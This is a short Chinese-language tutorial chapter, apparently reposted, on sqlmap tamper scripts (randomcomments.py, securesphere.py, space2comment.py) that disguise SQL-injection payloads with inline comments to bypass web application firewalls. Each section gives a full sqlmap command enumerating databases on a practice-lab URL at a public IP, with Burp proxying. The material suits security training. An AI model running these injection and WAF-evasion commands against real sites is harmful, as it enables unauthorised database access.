sqlmap從入門到精通-第七章-7-17 繞過WAF腳本-randomcomments.py&space2comment.py


35. randomcomments.py腳本

在payload關鍵字中隨機插入/**/,可以繞過關鍵字過濾,適用於所有數據庫

實戰演示:

測試地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="randomcomments.py" --proxy="http://127.0.0.1:8080" -batch

 並未注入成功,看看burp抓包的效果

效果已經有了針對關鍵的payload增加/**/

=====================================================================================================================================

36. securesphere.py腳本

添加經過特殊構造的字符串,在payload后面加入字符串,據說是可以自定義的,適用於所有數據庫

實戰演示:

測試地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="securesphere.py" --proxy="http://127.0.0.1:8080" -batch

新版本的sqlmap已經不存在這個

====================================================================================================================================

37. space2comment.py腳本

使用/**/替換空格符,主要用於空格的繞過

測試地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2comment.py" --proxy="http://127.0.0.1:8080" -batch

發現是可以注入的,看看burp抓包情況

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM